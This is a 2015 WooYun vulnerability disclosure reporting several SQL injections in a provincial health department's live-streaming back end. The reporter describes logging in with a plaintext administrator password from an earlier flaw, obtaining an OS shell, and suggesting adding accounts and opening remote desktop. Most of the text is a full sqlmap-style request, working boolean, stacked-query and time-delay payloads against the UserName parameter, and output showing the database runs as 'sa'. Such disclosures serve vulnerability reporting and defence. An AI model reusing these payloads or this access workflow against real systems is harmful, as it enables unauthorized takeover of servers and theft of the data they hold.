
Vulnerability summary

Defect ID: wooyun-2015-0137909

Title: Multiple SQL injections in the video-conference live-streaming back end of a provincial health department (DBA privileges + OS shell access + plaintext passwords)

Vendor: cncert National Internet Emergency Center

Author: 路人甲

Submitted: 2015-09-03 11:55

Fix time: 2015-10-21 08:54

Published: 2015-10-21 08:54

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-03: Details sent to the vendor and awaiting the vendor's response
2015-09-06: cncert National Internet Emergency Center has not yet been able to reach the affected organization; details disclosed only to the notifying body
2015-09-16: Details disclosed to core white hats and experts in the relevant fields
2015-09-26: Details disclosed to ordinary white hats
2015-10-06: Details disclosed to intern white hats
2015-10-21: Details disclosed to the public

Brief description:

The vulnerability has not been fixed; logging into the back end with a borrowed user account, there are multiple vulnerabilities!

Detailed description:

1.
First I saw the following vulnerability:
http://**.**.**.**/bugs/wooyun-2015-0125437
Its reporter only listed the vulnerability without explaining its impact.
But testing showed DBA privileges and the ability to read system files. With privileges this high, couldn't one add users, open 3389, and then take control of the machine, and so on???

1.jpg


Passwords are stored directly in plaintext

4.jpg


Testing --os-shell: it runs with administrator privileges

7.jpg


8.jpg


Continuing the test, I logged into the back end with the administrator account and the plaintext password.
I found several places with search functions and tested them.
2. Back end, first location: UserName is injectable

**.**.**.**:65493/genmedia/Modules/frmUser.aspx (POST)
__VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291b
nQCL2QWAmYPZBYiAgEPZBYQZg8PFgIeBFRleHQFAjQ4ZGQCAQ8PFgIfAgUEdGVzdGRkAgIPDxYCHwIFCDNAcXEuY29tZGQCA
w8PFgIfAgUSMjAxNS84LzI5IDIyOjMyOjE0ZGQCBA8PFgIfAgUSMjAxNS84LzI5IDIyOjMyOjMwZGQCBQ8PFgIfAgUG5q2j5bi4ZGQ
CBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIeD0NvbW1hbmRBcmd1bWVudAUCNDhkZAICD2QWEGYPDxYCHwIFAjQ3ZG
QCAQ8PFgIfAgUBJ2RkAgIPDxYCHwIFBydAJy5jb21kZAIDDw8WAh8CBRIyMDE1LzgvMjYgMTU6MjI6NDZkZAIEDw8WAh8CBRIyM
DE1LzgvMjYgMTU6MjM6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQI
0N2RkAgMPZBYQZg8PFgIfAgUCNDZkZAIBDw8WAh8CBQnpu4Tlvrfog5xkZAICDw8WAh8CBQpoZHMzMjcwMjI2ZGQCAw8PFgI
fAgURMjAxNS82LzEyIDk6MDk6MjhkZAIEDw8WAh8CBREyMDE1LzYvMTIgOTowOTo1MGRkAgUPDxYCHwIFBuato
%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQ2ZGQCBA9kFhBmDw8WAh8CBQI0NWRkAgEPDxYCHwIFBndqamt6eGRkAgIPDxYCH
wIFEHd1amluY2RjQDE2My5jb21kZAIDDw8WAh8CBRIyMDE0LzgvMTkgMTA6MzU6MzNkZAIEDw8WAh8CBRIyMDE0LzgvMTkg
MTA6MzU6NDlkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQI0NWRkAgUPZB
YQZg8PFgIfAgUCNDRkZAIBDw8WAh8CBQblhYnlpLRkZAICDw8WAh8CBRZzaGlsZWlfMTk4NjExQHNpbmEuY29tZGQCAw8PFgIf
AgURMjAxNC84LzE5IDk6MTU6NDNkZAIEDw8WAh8CBREyMDE0LzgvMTkgOTozMjo1MWRkAgUPDxYCHwIFBuato
%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQ0ZGQCBg9kFhBmDw8WAh8CBQI0M2RkAgEPDxYCHwIFCWhhaWJhb18xMWRkAgIP
DxYCHwIFEGhmbGl1XzExQDE2My5jb21kZAIDDw8WAh8CBRIyMDE0LzgvMTggMTI6MDA6MzNkZAIEDw8WAh8CBRIyMDE0Lzgv
MTggMTI6MDA6NTNkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQI0M2RkAg
cPZBYQZg8PFgIfAgUCNDJkZAIBDw8WAh8CBQhoYWlhbndzamRkAgIPDxYCHwIFEDM3OTczNzU0NkBxcS5jb21kZAIDDw8WAh8
CBREyMDE0LzgvMTIgOTo1MDoyNmRkAgQPDxYCHwIFETIwMTQvOC8xMiA5OjUxOjEyZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8P
FgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwUCNDJkZAIID2QWEGYPDxYCHwIFAjQxZGQCAQ8PFgIfAgUP5pWm5LmJ5Y2r55
Sf6ZmiZGQCAg8PFgIfAgUGJm5ic3A7ZGQCAw8PFgIfAgUQMjAxNC84LzQgOTo0OToyNmRkAgQPDxYCHwIFBiZuYnNwO2RkAg
UPDxYCHwIFBuato%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQxZGQCCQ9kFhBmDw8WAh8CBQI0MGRkAgEPDxYCHwIFHuazsOW3nuW4guS4reilv
%2BWMu%2Be7k%2BWQiOWMu
%2BmZomRkAgIPDxYCHwIFEmRyLnh1IDA1MjNAMTYzLmNvbWRkAgMPDxYCHwIFEDIwMTQvOC80IDk6MDM6MTFkZAIEDw8
WAh8CBREyMDE0LzkvNSAxMDowNDo0NmRkAgUPDxYCHwIFBuato%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjQwZGQCCg9kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQC
Ag8PFgIfAgUONzk1MjI0MkBxcS5jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgO
TozMTo0MmRkAgUPDxYCHwIFBuato%2BW4uGRkAgYPDxYCHwIFBuemu
%2Be6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCCw9kFhBmDw8WAh8CBQIzOGRkAgEPDxYCHwIFCGNodXlpbGVpZGQCAg8P
FgIfAgUPNTk4MDEwMDRAcXEuY29tZGQCAw8PFgIfAgUQMjAxNC84LzIgOTo0ODo1MmRkAgQPDxYCHwIFEDIwMTQvOC8yIDk
6NDk6MTRkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzOGRkAgwPZBYQZ
g8PFgIfAgUCMzdkZAIBDw8WAh8CBQdjdWloNDE2ZGQCAg8PFgIfAgUOY2g3NzA0MUBxcS5jb21kZAIDDw8WAh8CBRIyMDE0Lz
cvMzEgMTY6MTE6MTJkZAIEDw8WAh8CBRIyMDE0LzcvMzEgMTY6MTI6MjVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CB
Qbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzN2RkAg0PZBYQZg8PFgIfAgUCMzZkZAIBDw8WAh8CBQtwYW5taW5nMTIzMWR
kAgIPDxYCHwIFEDQ2MjA5Mjg1N0BxcS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTc6MjQ6MzlkZAIEDw8WAh8CBRIyMDE0L
zcvMjkgMTc6MjQ6NTdkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzNmRk
Ag4PZBYQZg8PFgIfAgUCMzVkZAIBDw8WAh8CBQlxaWFua3VuOTlkZAICDw8WAh8CBRA3NTQ5ODk4MzNAcXEuY29tZGQCAw8
PFgIfAgUSMjAxNC83LzI5IDE1OjI1OjE2ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE1OjI2OjEzZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8
PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwUCMzVkZAIPD2QWEGYPDxYCHwIFAjM0ZGQCAQ8PFgIfAgUHbmpsY3dzeWR
kAgIPDxYCHwIFDWxjd3N5QDEyNi5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MTc6MzNkZAIEDw8WAh8CBRIyMDE0Lzcv
MjkgMTU6MTg6NDNkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzNGRkAh
APDxYCHgdWaXNpYmxlaGRkAhEPZBYCZg9kFggCAQ8PFgIfAgUBMWRkAgMPDxYCHwIFATRkZAIFDw8WAh4HRW5hYmxlZGhk
ZAIHDw8WAh8FaGRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAApkZ
GRkZGQVAQZVc2VySUQUKwAPFCsAAQIwFCsAAQIvFCsAAQIuFCsAAQItFCsAAQIsFCsAAQIrFCsAAQIqFCsAAQIpFCsAAQIoFCsA
AQInFCsAAQImFCsAAQIlFCsAAQIkFCsAAQIjFCsAAQIiAgQUKwABAjBkk9Gt195rbHxqZqPny1qj37TW2yU
%3D&__EVENTVALIDATION=/wEWOgKk0%2BWuDQKvruq2CALgq6f3DwL/q6f3DwL
%2Bq6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLpAQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK2
9YKwBQK29YawBQK59db/CwK59c7/CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKk
BgK09dakBgK39eaCDQK39d6CDQK39eqCDQLdu%2BCrBALdu%2BirBALdu
%2BSrBALcu4yLCwLcu4SLCwLcu4iLCwLeu/jpAQLeu/DpAQLeu/zpAQLhu%2BTACALhu%2BzACALhu
%2BDACALbu/CvBQLbu/ivBQLbu/SvBQLau9z/CwLau9T/CwLau9j/CwLcu4juAgLcu4DuAgLcu4zuAgKmqMHSBwL31dWUBgLflITA
DgKE58WOCJLgTGwcJHLjP7zficLBTQ413AEq&UserName=1&comboStatus=0&comboOnline=0&UserList
$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12


---
Place: POST
Parameter: UserName
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCWQWAmYPZBYWAgEPZBYQZg8PFgIeBFRleHQFAjQzZGQCAQ8
PFgIfAgUJaGFpYmFvXzExZGQCAg8PFgIfAgUQaGZsaXVfMTFAMTYzLmNvbWRkAgMPDxYCHwIFEjIwMTQ
vOC8xOCAxMjowMDozM2RkAgQPDxYCHwIFEjIwMTQvOC8xOCAxMjowMDo1M2RkAgUPDxYCHwIFBuato+W
4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAjQzZGQCAg9
kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQCAg8PFgIfAgUONzk1MjI0MkBxcS5
jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgOTozMTo0MmR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCAw9
kFhBmDw8WAh8CBQIzN2RkAgEPDxYCHwIFB2N1aWg0MTZkZAICDw8WAh8CBQ5jaDc3MDQxQHFxLmNvbWR
kAgMPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMToxMmRkAgQPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMjoyNWR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM3ZGQCBA9
kFhBmDw8WAh8CBQIzNmRkAgEPDxYCHwIFC3Bhbm1pbmcxMjMxZGQCAg8PFgIfAgUQNDYyMDkyODU3QHF
xLmNvbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNzoyNDozOWRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNzo
yNDo1N2RkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM
2ZGQCBQ9kFhBmDw8WAh8CBQIzMGRkAgEPDxYCHwIFCjMyMDMxMTEwMDFkZAICDw8WAh8CBQYmbmJzcDt
kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6MjNkZAIEDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6NDd
kZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzMGRkAgY
PZBYQZg8PFgIfAgUCMjJkZAIBDw8WAh8CBQk0OTQxODEwNDdkZAICDw8WAh8CBQ40OTQxODEwNDdALmN
vbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNDo0NjowMmRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNDo0Nzo
xMmRkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjIyZGQ
CBw9kFhBmDw8WAh8CBQIxNGRkAgEPDxYCHwIFB21pYW8xMjNkZAICDw8WAh8CBRMxNTE5MDA4ODQzMEA
xMzkuY29tZGQCAw8PFgIfAgUSMjAxNC83LzI5IDEzOjIzOjQ3ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE
zOjI0OjE2ZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwU
CMTRkZAIID2QWEGYPDxYCHwIFAjEzZGQCAQ8PFgIfAgUTMTUxOTAwODg0MzBAMTM5LmNvbWRkAgIPDxY
CHwIFEzE1MTkwMDg4NDMwQDEzOS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTM6MjM6MzNkZAIEDw8
WAh8CBQYmbmJzcDtkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8
WAh8DBQIxM2RkAgkPZBYQZg8PFgIfAgUBOWRkAgEPDxYCHwIFBndkcjEyM2RkAgIPDxYCHwIFD3dkcjE
yMzRAMTI2LmNvbWRkAgMPDxYCHwIFETIwMTQvNS84IDE1OjM0OjIxZGQCBA8PFgIfAgURMjAxNC81Lzg
gMTU6MzU6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8
DBQE5ZGQCCg8PFgIeB1Zpc2libGVoZGQCCw8PFgIfBGdkFgJmD2QWDAIBDw8WAh8CBQExZGQCAw8PFgI
fAgUBMWRkAgUPDxYCHgdFbmFibGVkaGRkAgcPDxYCHwVoZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkGAI
FHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAAp
kZGRkZGQVAQZVc2VySUQUKwAJFCsAAQIrFCsAAQInFCsAAQIlFCsAAQIkFCsAAQIeFCsAAQIWFCsAAQI
OFCsAAQINFCsAAQIJAgEUKwABAjBk0t10qE4bTt9ld2cvsVpIy/zF0kM=&__EVENTVALIDATION=/wEW
JgLx8+W4DwKvruq2CALgq6f3DwL/q6f3DwL+q6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLp
AQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK29YKwBQK29YawBQK59db/CwK59c7/
CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKkBgK09dak
BgK39eaCDQK39d6CDQK39eqCDQLdu+CrBALdu+irBALdu+SrBALnkrywAwKE5+2ACPRZ35EkzizzOD/H
2AnRNzJE2+qQ&UserName=1%' AND 7285=7285 AND '%'='&comboStatus=0&comboOnline=0&Us
erList$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCWQWAmYPZBYWAgEPZBYQZg8PFgIeBFRleHQFAjQzZGQCAQ8
PFgIfAgUJaGFpYmFvXzExZGQCAg8PFgIfAgUQaGZsaXVfMTFAMTYzLmNvbWRkAgMPDxYCHwIFEjIwMTQ
vOC8xOCAxMjowMDozM2RkAgQPDxYCHwIFEjIwMTQvOC8xOCAxMjowMDo1M2RkAgUPDxYCHwIFBuato+W
4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAjQzZGQCAg9
kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQCAg8PFgIfAgUONzk1MjI0MkBxcS5
jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgOTozMTo0MmR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCAw9
kFhBmDw8WAh8CBQIzN2RkAgEPDxYCHwIFB2N1aWg0MTZkZAICDw8WAh8CBQ5jaDc3MDQxQHFxLmNvbWR
kAgMPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMToxMmRkAgQPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMjoyNWR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM3ZGQCBA9
kFhBmDw8WAh8CBQIzNmRkAgEPDxYCHwIFC3Bhbm1pbmcxMjMxZGQCAg8PFgIfAgUQNDYyMDkyODU3QHF
xLmNvbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNzoyNDozOWRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNzo
yNDo1N2RkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM
2ZGQCBQ9kFhBmDw8WAh8CBQIzMGRkAgEPDxYCHwIFCjMyMDMxMTEwMDFkZAICDw8WAh8CBQYmbmJzcDt
kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6MjNkZAIEDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6NDd
kZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzMGRkAgY
PZBYQZg8PFgIfAgUCMjJkZAIBDw8WAh8CBQk0OTQxODEwNDdkZAICDw8WAh8CBQ40OTQxODEwNDdALmN
vbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNDo0NjowMmRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNDo0Nzo
xMmRkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjIyZGQ
CBw9kFhBmDw8WAh8CBQIxNGRkAgEPDxYCHwIFB21pYW8xMjNkZAICDw8WAh8CBRMxNTE5MDA4ODQzMEA
xMzkuY29tZGQCAw8PFgIfAgUSMjAxNC83LzI5IDEzOjIzOjQ3ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE
zOjI0OjE2ZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwU
CMTRkZAIID2QWEGYPDxYCHwIFAjEzZGQCAQ8PFgIfAgUTMTUxOTAwODg0MzBAMTM5LmNvbWRkAgIPDxY
CHwIFEzE1MTkwMDg4NDMwQDEzOS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTM6MjM6MzNkZAIEDw8
WAh8CBQYmbmJzcDtkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8
WAh8DBQIxM2RkAgkPZBYQZg8PFgIfAgUBOWRkAgEPDxYCHwIFBndkcjEyM2RkAgIPDxYCHwIFD3dkcjE
yMzRAMTI2LmNvbWRkAgMPDxYCHwIFETIwMTQvNS84IDE1OjM0OjIxZGQCBA8PFgIfAgURMjAxNC81Lzg
gMTU6MzU6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8
DBQE5ZGQCCg8PFgIeB1Zpc2libGVoZGQCCw8PFgIfBGdkFgJmD2QWDAIBDw8WAh8CBQExZGQCAw8PFgI
fAgUBMWRkAgUPDxYCHgdFbmFibGVkaGRkAgcPDxYCHwVoZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkGAI
FHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAAp
kZGRkZGQVAQZVc2VySUQUKwAJFCsAAQIrFCsAAQInFCsAAQIlFCsAAQIkFCsAAQIeFCsAAQIWFCsAAQI
OFCsAAQINFCsAAQIJAgEUKwABAjBk0t10qE4bTt9ld2cvsVpIy/zF0kM=&__EVENTVALIDATION=/wEW
JgLx8+W4DwKvruq2CALgq6f3DwL/q6f3DwL+q6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLp
AQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK29YKwBQK29YawBQK59db/CwK59c7/
CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKkBgK09dak
BgK39eaCDQK39d6CDQK39eqCDQLdu+CrBALdu+irBALdu+SrBALnkrywAwKE5+2ACPRZ35EkzizzOD/H
2AnRNzJE2+qQ&UserName=1%'; WAITFOR DELAY '0:0:5'--&comboStatus=0&comboOnline=0&U
serList$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTc4MjI3NDY4OA9kFgICAw9kFgICCw88KwANAQAPFgQeC18
hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCCWQWAmYPZBYWAgEPZBYQZg8PFgIeBFRleHQFAjQzZGQCAQ8
PFgIfAgUJaGFpYmFvXzExZGQCAg8PFgIfAgUQaGZsaXVfMTFAMTYzLmNvbWRkAgMPDxYCHwIFEjIwMTQ
vOC8xOCAxMjowMDozM2RkAgQPDxYCHwIFEjIwMTQvOC8xOCAxMjowMDo1M2RkAgUPDxYCHwIFBuato+W
4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHg9Db21tYW5kQXJndW1lbnQFAjQzZGQCAg9
kFhBmDw8WAh8CBQIzOWRkAgEPDxYCHwIFC3BlaWxpbmcxMjU4ZGQCAg8PFgIfAgUONzk1MjI0MkBxcS5
jb21kZAIDDw8WAh8CBRAyMDE0LzgvNCA4OjM5OjQ3ZGQCBA8PFgIfAgUQMjAxNC84LzQgOTozMTo0MmR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM5ZGQCAw9
kFhBmDw8WAh8CBQIzN2RkAgEPDxYCHwIFB2N1aWg0MTZkZAICDw8WAh8CBQ5jaDc3MDQxQHFxLmNvbWR
kAgMPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMToxMmRkAgQPDxYCHwIFEjIwMTQvNy8zMSAxNjoxMjoyNWR
kAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM3ZGQCBA9
kFhBmDw8WAh8CBQIzNmRkAgEPDxYCHwIFC3Bhbm1pbmcxMjMxZGQCAg8PFgIfAgUQNDYyMDkyODU3QHF
xLmNvbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNzoyNDozOWRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNzo
yNDo1N2RkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjM
2ZGQCBQ9kFhBmDw8WAh8CBQIzMGRkAgEPDxYCHwIFCjMyMDMxMTEwMDFkZAICDw8WAh8CBQYmbmJzcDt
kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6MjNkZAIEDw8WAh8CBRIyMDE0LzcvMjkgMTU6MDY6NDd
kZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8DBQIzMGRkAgY
PZBYQZg8PFgIfAgUCMjJkZAIBDw8WAh8CBQk0OTQxODEwNDdkZAICDw8WAh8CBQ40OTQxODEwNDdALmN
vbWRkAgMPDxYCHwIFEjIwMTQvNy8yOSAxNDo0NjowMmRkAgQPDxYCHwIFEjIwMTQvNy8yOSAxNDo0Nzo
xMmRkAgUPDxYCHwIFBuato+W4uGRkAgYPDxYCHwIFBuemu+e6v2RkAgcPZBYCAgEPDxYCHwMFAjIyZGQ
CBw9kFhBmDw8WAh8CBQIxNGRkAgEPDxYCHwIFB21pYW8xMjNkZAICDw8WAh8CBRMxNTE5MDA4ODQzMEA
xMzkuY29tZGQCAw8PFgIfAgUSMjAxNC83LzI5IDEzOjIzOjQ3ZGQCBA8PFgIfAgUSMjAxNC83LzI5IDE
zOjI0OjE2ZGQCBQ8PFgIfAgUG5q2j5bi4ZGQCBg8PFgIfAgUG56a757q/ZGQCBw9kFgICAQ8PFgIfAwU
CMTRkZAIID2QWEGYPDxYCHwIFAjEzZGQCAQ8PFgIfAgUTMTUxOTAwODg0MzBAMTM5LmNvbWRkAgIPDxY
CHwIFEzE1MTkwMDg4NDMwQDEzOS5jb21kZAIDDw8WAh8CBRIyMDE0LzcvMjkgMTM6MjM6MzNkZAIEDw8
WAh8CBQYmbmJzcDtkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8
WAh8DBQIxM2RkAgkPZBYQZg8PFgIfAgUBOWRkAgEPDxYCHwIFBndkcjEyM2RkAgIPDxYCHwIFD3dkcjE
yMzRAMTI2LmNvbWRkAgMPDxYCHwIFETIwMTQvNS84IDE1OjM0OjIxZGQCBA8PFgIfAgURMjAxNC81Lzg
gMTU6MzU6MDVkZAIFDw8WAh8CBQbmraPluLhkZAIGDw8WAh8CBQbnprvnur9kZAIHD2QWAgIBDw8WAh8
DBQE5ZGQCCg8PFgIeB1Zpc2libGVoZGQCCw8PFgIfBGdkFgJmD2QWDAIBDw8WAh8CBQExZGQCAw8PFgI
fAgUBMWRkAgUPDxYCHgdFbmFibGVkaGRkAgcPDxYCHwVoZGQCCQ8PFgIfBWhkZAILDw8WAh8FaGRkGAI
FHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQlidG5TZWFyY2gFCFVzZXJMaXN0DxQrAAp
kZGRkZGQVAQZVc2VySUQUKwAJFCsAAQIrFCsAAQInFCsAAQIlFCsAAQIkFCsAAQIeFCsAAQIWFCsAAQI
OFCsAAQINFCsAAQIJAgEUKwABAjBk0t10qE4bTt9ld2cvsVpIy/zF0kM=&__EVENTVALIDATION=/wEW
JgLx8+W4DwKvruq2CALgq6f3DwL/q6f3DwL+q6f3DwKR3J7RAwKO3J7RAwKP3J7RAwKln/PuCgK99fLp
AQK99frpAQK99e7pAQK89d7ACAK89ebACAK89eLACAK29YqwBQK29YKwBQK29YawBQK59db/CwK59c7/
CwK59dr/CwK79YLuAgK79YruAgK79f7tAgK69e7ECQK69fbECQK69fLECQK09dqkBgK09dKkBgK09dak
BgK39eaCDQK39d6CDQK39eqCDQLdu+CrBALdu+irBALdu+SrBALnkrywAwKE5+2ACPRZ35EkzizzOD/H
2AnRNzJE2+qQ&UserName=1%' WAITFOR DELAY '0:0:5'--&comboStatus=0&comboOnline=0&Us
erList$ctl18$txtNewPageIndex=1&btnSearch.x=36&btnSearch.y=12
---
[01:52:32] [INFO] testing Microsoft SQL Server
[01:52:32] [INFO] confirming Microsoft SQL Server
[01:52:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[01:52:32] [INFO] fetching current user
[01:52:32] [INFO] retrieving the length of query output
[01:52:32] [INFO] retrieved:
[01:52:32] [WARNING] reflective value(s) found and filtering out
2
[01:52:41] [INFO] retrieved: sa
current user: 'sa'
